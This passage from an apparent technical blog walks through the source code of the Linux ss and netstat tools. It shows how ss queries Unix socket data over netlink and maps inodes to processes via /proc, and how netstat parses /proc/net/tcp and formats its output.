    if ((fp = net_unix_open()) == NULL)
        return -1;
    if (!fgets(buf, sizeof(buf), fp)) {
        fclose(fp);
        return -1;
    }
 
    if (memcmp(buf, "Peer", 4) == 0)
        newformat = 1;
    cnt = 0;
 
    while (fgets(buf, sizeof(buf), fp)) {
        struct sockstat *u, **insp;
        int flags;
 
        if (!(u = calloc(1, sizeof(*u))))
            break;
 
        if (sscanf(buf, "%x: %x %x %x %x %x %d %s",
               &u->rport, &u->rq, &u->wq, &flags, &u->type,
               &u->state, &u->ino, name) < 8)
            name[0] = 0;
 
        u->lport = u->ino;
        u->local.family = u->remote.family = AF_UNIX;
 
        if (flags & (1 << 16)) {
            u->state = SS_LISTEN;
        } else if (u->state > 0 &&
               u->state <= ARRAY_SIZE(unix_state_map)) {
            u->state = unix_state_map[u->state-1];
            if (u->type == SOCK_DGRAM && u->state == SS_CLOSE && u->rport)
                u->state = SS_ESTABLISHED;
        }
        if (unix_type_skip(u, f) ||
            !(f->states & (1 << u->state))) {
            free(u);
            continue;
        }
 
        if (!newformat) {
            u->rport = 0;
            u->rq = 0;
            u->wq = 0;
        }
 
        if (name[0]) {
            u->name = strdup(name);
            if (!u->name) {
                free(u);
                break;
            }
        }
 
        if (u->rport) {
            struct sockstat *p;
 
            for (p = list; p; p = p->next) {
                if (u->rport == p->lport)
                    break;
            }
            if (!p)
                u->peer_name = "?";
            else
                u->peer_name = p->name ? : "*";
        }
 
        if (f->f) {
            struct sockstat st = {
                .local.family = AF_UNIX,
                .remote.family = AF_UNIX,
            };
 
            memcpy(st.local.data, &u->name, sizeof(u->name));
            if (strcmp(u->peer_name, "*"))
                memcpy(st.remote.data, &u->peer_name,
                       sizeof(u->peer_name));
            if (run_ssfilter(f->f, &st) == 0) {
                free(u->name);
                free(u);
                continue;
            }
        }
 
        insp = &list;
        while (*insp) {
            if (u->type < (*insp)->type ||
                (u->type == (*insp)->type &&
                 u->ino < (*insp)->ino))
                break;
            insp = &(*insp)->next;
        }
        u->next = *insp;
        *insp = u;
 
        if (++cnt > MAX_UNIX_REMEMBER) {
            while (list) {
                unix_stats_print(list, f);
                printf("\n");
 
                unix_list_drop_first(&list);
            }
            cnt = 0;
        }
    }
    fclose(fp);
    while (list) {
        unix_stats_print(list, f);
        printf("\n");
 
        unix_list_drop_first(&list);
    }
 
    return 0;
}

This function is the core of parsing the socket data. It is long, so let's go through it piece by piece.

unix_show_netlink

if (!getenv("PROC_NET_UNIX") && !getenv("PROC_ROOT")
       && unix_show_netlink(f) == 0)
       return 0;
  • getenv() checks whether the PROC_NET_UNIX or PROC_ROOT environment variable is set
  • unix_show_netlink(f) takes the netlink path

Stepping into unix_show_netlink():

static int unix_show_netlink(struct filter *f)
{
    DIAG_REQUEST(req, struct unix_diag_req r);
 
    req.r.sdiag_family = AF_UNIX;
    req.r.udiag_states = f->states;
    req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
    if (show_mem)
        req.r.udiag_show |= UDIAG_SHOW_MEMINFO;
 
    return handle_netlink_request(f, &req.nlh, sizeof(req), unix_show_sock);
}

f is a filter used to hold some simple filtering conditions.

req.r.sdiag_family = AF_UNIX;
req.r.udiag_states = f->states;
req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

These lines fill in the request header of the sock_diag netlink message; handle_netlink_request(f, &req.nlh, sizeof(req), unix_show_sock); is then called.

handle_netlink_request

Stepping into the implementation of handle_netlink_request:

static int handle_netlink_request(struct filter *f, struct nlmsghdr *req,
        size_t size, rtnl_filter_t show_one_sock)
{
    int ret = -1;
    struct rtnl_handle rth;
 
    if (rtnl_open_byproto(&rth, 0, NETLINK_SOCK_DIAG))
        return -1;
 
    rth.dump = MAGIC_SEQ;
 
    if (rtnl_send(&rth, req, size) < 0)
        goto Exit;
 
    if (rtnl_dump_filter(&rth, show_one_sock, f))
        goto Exit;
 
    ret = 0;
Exit:
    rtnl_close(&rth);
    return ret;
}
  • rtnl_send(&rth, req, size) sends the sock_diag netlink request.
  • rtnl_dump_filter(&rth, show_one_sock, f) receives the netlink replies and calls back into show_one_sock().

rtnl_send

Stepping into lib/libnetlink.c:

int rtnl_send(struct rtnl_handle *rth, const void *buf, int len)
{
    return send(rth->fd, buf, len, 0);
}

rtnl_send simply calls send() to transmit the message.

rtnl_dump_filter

Again in lib/libnetlink.c:

int rtnl_dump_filter_nc(struct rtnl_handle *rth,
             rtnl_filter_t filter,
             void *arg1, __u16 nc_flags)
{
    const struct rtnl_dump_filter_arg a[2] = {
        { .filter = filter, .arg1 = arg1, .nc_flags = nc_flags, },
        { .filter = NULL,   .arg1 = NULL, .nc_flags = 0, },
    };
 
    return rtnl_dump_filter_l(rth, a);
}

rtnl_dump_filter_nc() sets up the rtnl_dump_filter_arg filter array and then calls rtnl_dump_filter_l():

int rtnl_dump_filter_l(struct rtnl_handle *rth,
               const struct rtnl_dump_filter_arg *arg)
{
    struct sockaddr_nl nladdr;
    struct iovec iov;
    struct msghdr msg = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };
    char buf[32768];
    int dump_intr = 0;
 
    iov.iov_base = buf;
    while (1) {
        int status;
        const struct rtnl_dump_filter_arg *a;
        int found_done = 0;
        int msglen = 0;
 
        iov.iov_len = sizeof(buf);
        status = recvmsg(rth->fd, &msg, 0);
 
        if (status < 0) {
            if (errno == EINTR || errno == EAGAIN)
                continue;
            fprintf(stderr, "netlink receive error %s (%d)\n",
                strerror(errno), errno);
            return -1;
        }
 
        if (status == 0) {
            fprintf(stderr, "EOF on netlink\n");
            return -1;
        }
 
        if (rth->dump_fp)
            fwrite(buf, 1, NLMSG_ALIGN(status), rth->dump_fp);
 
        for (a = arg; a->filter; a++) {
            struct nlmsghdr *h = (struct nlmsghdr *)buf;
 
            msglen = status;
 
            while (NLMSG_OK(h, msglen)) {
                int err = 0;
 
                h->nlmsg_flags &= ~a->nc_flags;
 
                if (nladdr.nl_pid != 0 ||
                    h->nlmsg_pid != rth->local.nl_pid ||
                    h->nlmsg_seq != rth->dump)
                    goto skip_it;
 
                if (h->nlmsg_flags & NLM_F_DUMP_INTR)
                    dump_intr = 1;
 
                if (h->nlmsg_type == NLMSG_DONE) {
                    err = rtnl_dump_done(h);
                    if (err < 0)
                        return -1;
 
                    found_done = 1;
                    break; /* process next filter */
                }
 
                if (h->nlmsg_type == NLMSG_ERROR) {
                    rtnl_dump_error(rth, h);
                    return -1;
                }
 
                if (!rth->dump_fp) {
                    err = a->filter(&nladdr, h, a->arg1);
                    if (err < 0)
                        return err;
                }
 
skip_it:
                h = NLMSG_NEXT(h, msglen);
            }
        }
 
        if (found_done) {
            if (dump_intr)
                fprintf(stderr,
                    "Dump was interrupted and may be inconsistent.\n");
            return 0;
        }
 
        if (msg.msg_flags & MSG_TRUNC) {
            fprintf(stderr, "Message truncated\n");
            continue;
        }
        if (msglen) {
            fprintf(stderr, "!!!Remnant of size %d\n", msglen);
            exit(1);
        }
    }
}

rtnl_dump_filter_l() receives the data over netlink and then filters it according to rtnl_dump_filter_arg.

Receiving the data:

struct sockaddr_nl nladdr;
struct iovec iov;
struct msghdr msg = {
    .msg_name = &nladdr,
    .msg_namelen = sizeof(nladdr),
    .msg_iov = &iov,
    .msg_iovlen = 1,
};
.....
status = recvmsg(rth->fd, &msg, 0);

Filtering the data:

for (a = arg; a->filter; a++) {
    struct nlmsghdr *h = (struct nlmsghdr *)buf;
    .....
    h->nlmsg_flags &= ~a->nc_flags;
    if (nladdr.nl_pid != 0 ||
                h->nlmsg_pid != rth->local.nl_pid ||
                h->nlmsg_seq != rth->dump)
                goto skip_it;
 
            if (h->nlmsg_flags & NLM_F_DUMP_INTR)
                dump_intr = 1;
 
            if (h->nlmsg_type == NLMSG_DONE) {
                err = rtnl_dump_done(h);
                if (err < 0)
                    return -1;
 
                found_done = 1;
                break; /* process next filter */
            }
            .......

As mentioned earlier, handle_netlink_request(f, &req.nlh, sizeof(req), unix_show_sock); eventually invokes the unix_show_sock callback.

unix_show_sock

Stepping into the implementation of unix_show_sock:

static int unix_show_sock(const struct sockaddr_nl *addr, struct nlmsghdr *nlh,
        void *arg)
{
    struct filter *f = (struct filter *)arg;
    struct unix_diag_msg *r = NLMSG_DATA(nlh);
    struct rtattr *tb[UNIX_DIAG_MAX+1];
    char name[128];
    struct sockstat stat = { .name = "*", .peer_name = "*" };
 
    parse_rtattr(tb, UNIX_DIAG_MAX, (struct rtattr *)(r+1),
             nlh->nlmsg_len - NLMSG_LENGTH(sizeof(*r)));
 
    stat.type  = r->udiag_type;
    stat.state = r->udiag_state;
    stat.ino   = stat.lport = r->udiag_ino;
    stat.local.family = stat.remote.family = AF_UNIX;
 
    if (unix_type_skip(&stat, f))
        return 0;
 
    if (tb[UNIX_DIAG_RQLEN]) {
        struct unix_diag_rqlen *rql = RTA_DATA(tb[UNIX_DIAG_RQLEN]);
 
        stat.rq = rql->udiag_rqueue;
        stat.wq = rql->udiag_wqueue;
    }
    if (tb[UNIX_DIAG_NAME]) {
        int len = RTA_PAYLOAD(tb[UNIX_DIAG_NAME]);
 
        memcpy(name, RTA_DATA(tb[UNIX_DIAG_NAME]), len);
        name[len] = '\0';
        if (name[0] == '\0') {
            int i;
            for (i = 0; i < len; i++)
                if (name[i] == '\0')
                    name[i] = '@';
        }
        stat.name = &name[0];
        memcpy(stat.local.data, &stat.name, sizeof(stat.name));
    }
    if (tb[UNIX_DIAG_PEER])
        stat.rport = rta_getattr_u32(tb[UNIX_DIAG_PEER]);
 
    if (f->f && run_ssfilter(f->f, &stat) == 0)
        return 0;
 
    unix_stats_print(&stat, f);
 
    if (show_mem)
        print_skmeminfo(tb, UNIX_DIAG_MEMINFO);
    if (show_details) {
        if (tb[UNIX_DIAG_SHUTDOWN]) {
            unsigned char mask;
 
            mask = rta_getattr_u8(tb[UNIX_DIAG_SHUTDOWN]);
            printf(" %c-%c", mask & 1 ? '-' : '<', mask & 2 ? '-' : '>');
        }
    }
    printf("\n");
 
    return 0;
}

1. struct unix_diag_msg *r = NLMSG_DATA(nlh); and parse_rtattr(tb, UNIX_DIAG_MAX, (struct rtattr *)(r+1), nlh->nlmsg_len - NLMSG_LENGTH(sizeof(*r))); extract the payload and attributes from the netlink message.

2. Parse the data and populate the sockstat structure:

stat.type  = r->udiag_type;
stat.state = r->udiag_state;
stat.ino   = stat.lport = r->udiag_ino;
stat.local.family = stat.remote.family = AF_UNIX;
-------------------------------------------------
stat.rq = rql->udiag_rqueue;
stat.wq = rql->udiag_wqueue;

unix_stats_print

unix_stats_print(&stat, f); prints the connection's state:

static void unix_stats_print(struct sockstat *s, struct filter *f)
{
    char port_name[30] = {};
 
    sock_state_print(s);
 
    sock_addr_print(s->name ?: "*", " ",
            int_to_str(s->lport, port_name), NULL);
    sock_addr_print(s->peer_name ?: "*", " ",
            int_to_str(s->rport, port_name), NULL);
 
    proc_ctx_print(s);
}

sock_state_print

Stepping into sock_state_print():

static void sock_state_print(struct sockstat *s)
{
    const char *sock_name;
    static const char * const sstate_name[] = {
        "UNKNOWN",
        [SS_ESTABLISHED] = "ESTAB",
        [SS_SYN_SENT] = "SYN-SENT",
        [SS_SYN_RECV] = "SYN-RECV",
        [SS_FIN_WAIT1] = "FIN-WAIT-1",
        [SS_FIN_WAIT2] = "FIN-WAIT-2",
        [SS_TIME_WAIT] = "TIME-WAIT",
        [SS_CLOSE] = "UNCONN",
        [SS_CLOSE_WAIT] = "CLOSE-WAIT",
        [SS_LAST_ACK] = "LAST-ACK",
        [SS_LISTEN] =   "LISTEN",
        [SS_CLOSING] = "CLOSING",
    };
 
    switch (s->local.family) {
    case AF_UNIX:
        sock_name = unix_netid_name(s->type);
        break;
    case AF_INET:
    case AF_INET6:
        sock_name = proto_name(s->type);
        break;
    case AF_PACKET:
        sock_name = s->type == SOCK_RAW ? "p_raw" : "p_dgr";
        break;
    case AF_NETLINK:
        sock_name = "nl";
        break;
    default:
        sock_name = "unknown";
    }
 
    if (netid_width)
        printf("%-*s ", netid_width,
               is_sctp_assoc(s, sock_name) ? "" : sock_name);
    if (state_width) {
        if (is_sctp_assoc(s, sock_name))
            printf("`- %-*s ", state_width - 3,
                   sctp_sstate_name[s->state]);
        else
            printf("%-*s ", state_width, sstate_name[s->state]);
    }
 
    printf("%-6d %-6d ", s->rq, s->wq);
}

It prints the appropriate content depending on s->local.family; the code is a straightforward switch statement, so no further explanation is needed. After everything has run, the output is:

Netid  State      Recv-Q Send-Q Local Address:Port                 Peer Address:Port               
u_seq  ESTAB      0      0      @00017 309855                * 309856

Note that the default ss output contains no pid information. With ss -p, the result is:

Netid  State      Recv-Q Send-Q Local Address:Port                 Peer Address:Port               
u_seq  ESTAB      0      0      @00017 309855                * 309856                users:(("code",pid=17009,fd=17))
u_seq  ESTAB      0      0      @00012 157444                * 157445                users:(("chrome",pid=5834,fd=10))

user_ent_hash_build

When the -p flag is added, the program executes:

case 'p':
    show_users++;
    user_ent_hash_build();
    break;

show_users becomes 1 and the program then calls user_ent_hash_build():

static void user_ent_hash_build(void)
{
    const char *root = getenv("PROC_ROOT") ? : "/proc/";
    struct dirent *d;
    char name[1024];
    int nameoff;
    DIR *dir;
    char *pid_context;
    char *sock_context;
    const char *no_ctx = "unavailable";
    static int user_ent_hash_build_init;
 
    /* If show_users & show_proc_ctx set only do this once */
    if (user_ent_hash_build_init != 0)
        return;
 
    user_ent_hash_build_init = 1;
 
    strlcpy(name, root, sizeof(name));
 
    if (strlen(name) == 0 || name[strlen(name)-1] != '/')
        strcat(name, "/");
 
    nameoff = strlen(name);
 
    dir = opendir(name);
    if (!dir)
        return;
 
    while ((d = readdir(dir)) != NULL) {
        struct dirent *d1;
        char process[16];
        char *p;
        int pid, pos;
        DIR *dir1;
        char crap;
 
        if (sscanf(d->d_name, "%d%c", &pid, &crap) != 1)
            continue;
 
        if (getpidcon(pid, &pid_context) != 0)
            pid_context = strdup(no_ctx);
 
        snprintf(name + nameoff, sizeof(name) - nameoff, "%d/fd/", pid);
        pos = strlen(name);
        if ((dir1 = opendir(name)) == NULL) {
            free(pid_context);
            continue;
        }
 
        process[0] = '\0';
        p = process;
 
        while ((d1 = readdir(dir1)) != NULL) {
            const char *pattern = "socket:[";
            unsigned int ino;
            char lnk[64];
            int fd;
            ssize_t link_len;
            char tmp[1024];
 
            if (sscanf(d1->d_name, "%d%c", &fd, &crap) != 1)
                continue;
 
            snprintf(name+pos, sizeof(name) - pos, "%d", fd);
 
            link_len = readlink(name, lnk, sizeof(lnk)-1);
            if (link_len == -1)
                continue;
            lnk[link_len] = '\0';
 
            if (strncmp(lnk, pattern, strlen(pattern)))
                continue;
 
            sscanf(lnk, "socket:[%u]", &ino);
 
            snprintf(tmp, sizeof(tmp), "%s/%d/fd/%s",
                    root, pid, d1->d_name);
 
            if (getfilecon(tmp, &sock_context) <= 0)
                sock_context = strdup(no_ctx);
 
            if (*p == '\0') {
                FILE *fp;
 
                snprintf(tmp, sizeof(tmp), "%s/%d/stat",
                    root, pid);
                if ((fp = fopen(tmp, "r")) != NULL) {
                    if (fscanf(fp, "%*d (%[^)])", p) < 1)
                        ; /* ignore */
                    fclose(fp);
                }
            }
            user_ent_add(ino, p, pid, fd,
                    pid_context, sock_context);
            free(sock_context);
        }
        free(pid_context);
        closedir(dir1);
    }
    closedir(dir);
}

This parsing approach is similar to prg_cache_load in netstat: both walk the entries under /proc/<pid>/fd to obtain socket inode numbers. Once the pid, inode and fd are known, user_ent_add() is called.

user_ent_add

static void user_ent_add(unsigned int ino, char *process,
                    int pid, int fd,
                    char *proc_ctx,
                    char *sock_ctx)
{
    struct user_ent *p, **pp;
 
    p = malloc(sizeof(struct user_ent));
    if (!p) {
        fprintf(stderr, "ss: failed to malloc buffer\n");
        abort();
    }
    p->next = NULL;
    p->ino = ino;
    p->pid = pid;
    p->fd = fd;
    p->process = strdup(process);
    p->process_ctx = strdup(proc_ctx);
    p->socket_ctx = strdup(sock_ctx);
 
    pp = &user_ent_hash[user_ent_hashfn(ino)];
    p->next = *pp;
    *pp = p;
}

It records the inode, pid and fd information, linking the entries together into a chain.

proc_ctx_print

When printing the results, the program calls proc_ctx_print():

static void proc_ctx_print(struct sockstat *s)
{
    char *buf;
 
    if (show_proc_ctx || show_sock_ctx) {
        if (find_entry(s->ino, &buf,
                (show_proc_ctx & show_sock_ctx) ?
                PROC_SOCK_CTX : PROC_CTX) > 0) {
            printf(" users:(%s)", buf);
            free(buf);
        }
    } else if (show_users) {
        if (find_entry(s->ino, &buf, USERS) > 0) {
            printf(" users:(%s)", buf);
            free(buf);
        }
    }
}

If show_users > 0, find_entry() is executed to look up the owning process by inode number:

find_entry

static int find_entry(unsigned int ino, char **buf, int type)
{
    struct user_ent *p;
    int cnt = 0;
    char *ptr;
    char *new_buf;
    int len, new_buf_len;
    int buf_used = 0;
    int buf_len = 0;
 
    if (!ino)
        return 0;
 
    p = user_ent_hash[user_ent_hashfn(ino)];
    ptr = *buf = NULL;
    while (p) {
        if (p->ino != ino)
            goto next;
 
        while (1) {
            ptr = *buf + buf_used;
            switch (type) {
            case USERS:
                len = snprintf(ptr, buf_len - buf_used,
                    "(\"%s\",pid=%d,fd=%d),",
                    p->process, p->pid, p->fd);
                break;
            case PROC_CTX:
                len = snprintf(ptr, buf_len - buf_used,
                    "(\"%s\",pid=%d,proc_ctx=%s,fd=%d),",
                    p->process, p->pid,
                    p->process_ctx, p->fd);
                break;
            case PROC_SOCK_CTX:
                len = snprintf(ptr, buf_len - buf_used,
                    "(\"%s\",pid=%d,proc_ctx=%s,fd=%d,sock_ctx=%s),",
                    p->process, p->pid,
                    p->process_ctx, p->fd,
                    p->socket_ctx);
                break;
            default:
                fprintf(stderr, "ss: invalid type: %d\n", type);
                abort();
            }
 
            if (len < 0 || len >= buf_len - buf_used) {
                new_buf_len = buf_len + ENTRY_BUF_SIZE;
                new_buf = realloc(*buf, new_buf_len);
                if (!new_buf) {
                    fprintf(stderr, "ss: failed to malloc buffer\n");
                    abort();
                }
                *buf = new_buf;
                buf_len = new_buf_len;
                continue;
            } else {
                buf_used += len;
                break;
            }
        }
        cnt++;
next:
        p = p->next;
    }
    if (buf_used) {
        ptr = *buf + buf_used;
        ptr[-1] = '\0';
    }
    return cnt;
}

It walks the chain at p = user_ent_hash[user_ent_hashfn(ino)]; to visit every node:

p = user_ent_hash[user_ent_hashfn(ino)];
ptr = *buf = NULL;
while (p) {
    if (p->ino != ino)
        goto next;

When a node with a matching inode is found, the pid has been located, and the entry is formatted as follows:

switch (type) {
            case USERS:
                len = snprintf(ptr, buf_len - buf_used,
                    "(\"%s\",pid=%d,fd=%d),",
                    p->process, p->pid, p->fd);
                break;

The final output is:

Netid  State      Recv-Q Send-Q Local Address:Port                 Peer Address:Port               
u_seq  ESTAB      0      0      @00017 309855                * 309856                users:(("code",pid=17009,fd=17))

Summary

Because ss and netstat obtain their data in different ways, they differ greatly in execution efficiency. The two approaches also provide useful ideas for anyone who needs to collect network data from a host.

netstat source-code debugging & analysis

Overview

Most people probably still check network state with netstat, but in fact netstat is gradually being replaced, and many newer Linux distributions no longer ship it. Take Ubuntu 18.04 as an example:

~ netstat 
zsh: command not found: netstat

According to the article "difference between netstat and ss in linux?":

NOTE This program is obsolete. Replacement for netstat is ss.
Replacement for netstat -r is ip route. Replacement for netstat -i is
ip -s link. Replacement for netstat -g is ip maddr.

In other words: netstat is obsolete, parts of its functionality have been taken over by the ip command, and the more powerful ss is available for displaying information about active sockets. ss provides socket statistics similar to netstat, but it shows more detailed information about TCP and connection states, and it is faster and more efficient. netstat works purely by parsing /proc/net/tcp, so when a server has a very large number of socket connections, running netstat becomes very slow. ss instead uses tcp_diag, fetching network information from the kernel over netlink, which is why it is faster and more complete.

The figure below shows the difference between ss and netstat from a monitoring perspective.

ss.png

ss obtains its information from the sockets themselves, while netstat parses the files under /proc/net/ to gather information about sockets, TCP/UDP, IP and Ethernet.

Comparing the efficiency of netstat and ss on the same machine:

time ss
........
real    0m0.016s
user    0m0.001s
sys        0m0.001s
--------------------------------
time netstat
real    0m0.198s
user    0m0.009s
sys        0m0.011s

ss is clearly much more efficient than netstat.

About netstat

netstat is one of the tools in the net-tools package. The net-tools source code is available, so we can use it to examine how netstat is implemented.

Debugging the netstat source

After downloading net-tools, import it into CLion and create a CMakeLists.txt with the following content:

cmake_minimum_required(VERSION 3.13)
project(test C)

set(BUILD_DIR .)

#add_executable()
add_custom_target(netstat command -c ${BUILD_DIR})

Change the compiler flags at line 59 of the top-level Makefile to:

CFLAGS ?= -O0 -g3

netstat.png

Configure your build options as shown in the figure above.

That completes the setup for source-level debugging of netstat.

tcp show

When netstat is run without any arguments, the program first reaches tcp_info() at line 2317:

#if HAVE_AFINET
    if (!flag_arg || flag_tcp) {
        i = tcp_info();
        if (i)
        return (i);
    }

    if (!flag_arg || flag_sctp) {
        i = sctp_info();
        if (i)
        return (i);
    }
.........

Stepping into tcp_info():

static int tcp_info(void)
{
    INFO_GUTS6(_PATH_PROCNET_TCP, _PATH_PROCNET_TCP6, "AF INET (tcp)",
           tcp_do_one, "tcp", "tcp6");
}

The arguments are as follows:

_PATH_PROCNET_TCP, defined in lib/pathnames.h as #define _PATH_PROCNET_TCP "/proc/net/tcp"

_PATH_PROCNET_TCP6, defined in lib/pathnames.h as #define _PATH_PROCNET_TCP6 "/proc/net/tcp6"

tcp_do_one, a function pointer, defined at line 1100; part of the code is shown below:

static void tcp_do_one(int lnr, const char *line, const char *prot)
{
unsigned long rxq, txq, time_len, retr, inode;
int num, local_port, rem_port, d, state, uid, timer_run, timeout;
char rem_addr[128], local_addr[128], timers[64];
const struct aftype *ap;
struct sockaddr_storage localsas, remsas;
struct sockaddr_in *localaddr = (struct sockaddr_in *)&localsas;
struct sockaddr_in *remaddr = (struct sockaddr_in *)&remsas;
......

tcp_do_one() parses one line of /proc/net/tcp or /proc/net/tcp6. For the meaning of each field in /proc/net/tcp, see the extension section of my earlier article "osquery源码解读之分析process_open_socket".

INFO_GUTS6

#define INFO_GUTS6(file,file6,name,proc,prot4,prot6)    \
 char buffer[8192];                    \
 int rc = 0;                        \
 int lnr = 0;                        \
 if (!flag_arg || flag_inet) {                \
    INFO_GUTS1(file,name,proc,prot4)            \
 }                            \
 if (!flag_arg || flag_inet6) {                \
    INFO_GUTS2(file6,proc,prot6)            \
 }                            \
 INFO_GUTS3

INFO_GUTS6 is defined as a #define macro; depending on whether flag_inet (IPv4) or flag_inet6 (IPv6) is set, it expands into different calls. Let's follow INFO_GUTS1(file,name,proc,prot4) for further analysis.

INFO_GUTS1

#define INFO_GUTS1(file,name,proc,prot)            \
  procinfo = proc_fopen((file));            \
  if (procinfo == NULL) {                \
    if (errno != ENOENT && errno != EACCES) {        \
      perror((file));                    \
      return -1;                    \
    }                            \
    if (!flag_noprot && (flag_arg || flag_ver))        \
      ESYSNOT("netstat", (name));            \
    if (!flag_noprot && flag_arg)            \
      rc = 1;                        \
  } else {                        \
    do {                        \
      if (fgets(buffer, sizeof(buffer), procinfo))    \
        (proc)(lnr++, buffer,prot);            \
    } while (!feof(procinfo));                \
    fclose(procinfo);                    \
  }

procinfo = proc_fopen((file)) obtains a file handle to /proc/net/tcp.

fgets(buffer, sizeof(buffer), procinfo) reads the file line by line into buffer.

(proc)(lnr++, buffer, prot) parses buffer via the proc function pointer, which is the tcp_do_one() function described above.

tcp_do_one

Take the line " 14: 020110AC:B498 CF0DE1B9:4362 06 00000000:00000000 03:000001B2 00000000 0 0 0 3 0000000000000000" as an example to walk through the execution of tcp_do_one().

tcp_do_one_1.png

Since we are analyzing IPv4, the #if HAVE_AFINET6 block is skipped and execution continues with:

num = sscanf(line,
    "%d: %64[0-9A-Fa-f]:%X %64[0-9A-Fa-f]:%X %X %lX:%lX %X:%lX %lX %d %d %lu %*s\n",
         &d, local_addr, &local_port, rem_addr, &rem_port, &state,
         &txq, &rxq, &timer_run, &time_len, &retr, &uid, &timeout, &inode);
if (num < 11) {
    fprintf(stderr, _("warning, got bogus tcp line.\n"));
    return;
}

This parses the line and fills each column into the corresponding field. The relevant declarations are:

char rem_addr[128], local_addr[128], timers[64];
struct sockaddr_storage localsas, remsas;
struct sockaddr_in *localaddr = (struct sockaddr_in *)&localsas;
struct sockaddr_in *remaddr = (struct sockaddr_in *)&remsas;

On Linux, sockaddr_in and sockaddr_storage are defined as follows:

struct sockaddr {
   unsigned short    sa_family;    // address family, AF_xxx
   char              sa_data[14];  // 14 bytes of protocol address
};


struct  sockaddr_in {
    short  int  sin_family;                      /* Address family */
    unsigned  short  int  sin_port;       /* Port number */
    struct  in_addr  sin_addr;              /* Internet address */
    unsigned  char  sin_zero[8];         /* Same size as struct sockaddr */
};
/* Internet address. */
struct in_addr {
  uint32_t       s_addr;     /* address in network byte order */
};

struct sockaddr_storage {
    sa_family_t  ss_family;     // address family

    // all this is padding, implementation specific, ignore it:
    char      __ss_pad1[_SS_PAD1SIZE];
    int64_t   __ss_align;
    char      __ss_pad2[_SS_PAD2SIZE];
};

Execution then continues with:

sscanf(local_addr, "%X", &localaddr->sin_addr.s_addr);
sscanf(rem_addr, "%X", &remaddr->sin_addr.s_addr);
localsas.ss_family = AF_INET;
remsas.ss_family = AF_INET;

sscanf(local_addr, "%X", ...) converts local_addr from its hex representation and stores the result in &localaddr->sin_addr.s_addr (the s_addr member of struct in_addr); the same is done for &remaddr->sin_addr.s_addr. The result looks like this:

saddr.png

addr_do_one

addr_do_one(local_addr, sizeof(local_addr), 22, ap, &localsas, local_port, "tcp");
addr_do_one(rem_addr, sizeof(rem_addr), 22, ap, &remsas, rem_port, "tcp");

Execution eventually reaches the addr_do_one() function, which formats the local and remote IP addresses and ports.

static void addr_do_one(char *buf, size_t buf_len, size_t short_len, const struct aftype *ap,
            const struct sockaddr_storage *addr,
            int port, const char *proto
)
{
    const char *sport, *saddr;
    size_t port_len, addr_len;

    saddr = ap->sprint(addr, flag_not & FLAG_NUM_HOST);
    sport = get_sname(htons(port), proto, flag_not & FLAG_NUM_PORT);
    addr_len = strlen(saddr);
    port_len = strlen(sport);
    if (!flag_wide && (addr_len + port_len > short_len)) {
        /* Assume port name is short */
        port_len = netmin(port_len, short_len - 4);
        addr_len = short_len - port_len;
        strncpy(buf, saddr, addr_len);
        buf[addr_len] = '\0';
        strcat(buf, ":");
        strncat(buf, sport, port_len);
    } else
          snprintf(buf, buf_len, "%s:%s", saddr, sport);
}

1. saddr = ap->sprint(addr, flag_not & FLAG_NUM_HOST); decides whether addr should be resolved to a hostname. Since addr here is 127.0.0.1, the conversion yields localhost; FLAG_NUM_HOST is equivalent to the --numeric-hosts option.

2. sport = get_sname(htons(port), proto, flag_not & FLAG_NUM_PORT); resolves the port to a service name where possible; FLAG_NUM_PORT is equivalent to the --numeric-ports option.

3. !flag_wide && (addr_len + port_len > short_len) decides whether the IP and port need to be truncated; flag_wide corresponds to -W, --wide (don't truncate IP addresses), and short_len is 22.

4. snprintf(buf, buf_len, "%s:%s", saddr, sport); writes IP:PORT into buf.

output

Finally, the program executes:

printf("%-4s  %6ld %6ld %-*s %-*s %-11s",
           prot, rxq, txq, (int)netmax(23,strlen(local_addr)), local_addr, (int)netmax(23,strlen(rem_addr)), rem_addr, _(tcp_state[state]));

which prints the result in the specified format.

finish_this_one

Finally, the program executes finish_this_one(uid, inode, timers);

static void finish_this_one(int uid, unsigned long inode, const char *timers)
{
    struct passwd *pw;

    if (flag_exp > 1) {
    if (!(flag_not & FLAG_NUM_USER) && ((pw = getpwuid(uid)) != NULL))
        printf(" %-10s ", pw->pw_name);
    else
        printf(" %-10d ", uid);
    printf("%-10lu",inode);
    }
    if (flag_prg)
    printf(" %-" PROGNAME_WIDTHs "s",prg_cache_get(inode));
    if (flag_selinux)
    printf(" %-" SELINUX_WIDTHs "s",prg_cache_get_con(inode));

    if (flag_opt)
    printf(" %s", timers);
    putchar('\n');
}

1. flag_exp corresponds to the -e option (-e, --extend: display other/more information). For example:

netstat -e 
Proto Recv-Q Send-Q Local Address           Foreign Address         State       User       Inode
tcp        0      0 localhost:6379          172.16.1.200:46702    ESTABLISHED redis      437788048

netstat
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 localhost:6379          172.16.1.200:46702    ESTABLISHED

With -e, the User and Inode columns are shown as well. In this example the user name is resolved via getpwuid(); if no matching user exists, the uid is printed instead.

2. flag_prg corresponds to -p, --programs (display PID/Program name for sockets). For example:

netstat -pe
Proto Recv-Q Send-Q Local Address           Foreign Address         State       User       Inode      PID/Program name
tcp        0      0 localhost:6379          172.16.1.200:34062      ESTABLISHED redis      437672000  6017/redis-server *

netstat -e
Proto Recv-Q Send-Q Local Address           Foreign Address         State       User       Inode
tcp        0      0 localhost:6379          172.16.1.200:46702    ESTABLISHED redis      437788048

As shown, the PID and process information are found from the inode via prg_cache_get(inode);

3. flag_selinux corresponds to -Z, --context (display SELinux security context for sockets).

prg_cache_get

Curious how a process can be located from an inode, let's trace the implementation of prg_cache_get():

#define PRG_HASH_SIZE 211

#define PRG_HASHIT(x) ((x) % PRG_HASH_SIZE)

static struct prg_node {
    struct prg_node *next;
    unsigned long inode;
    char name[PROGNAME_WIDTH];
    char scon[SELINUX_WIDTH];
} *prg_hash[PRG_HASH_SIZE];

static const char *prg_cache_get(unsigned long inode)
{
    unsigned hi = PRG_HASHIT(inode);
    struct prg_node *pn;

    for (pn = prg_hash[hi]; pn; pn = pn->next)
    if (pn->inode == inode)
        return (pn->name);
    return ("-");
}

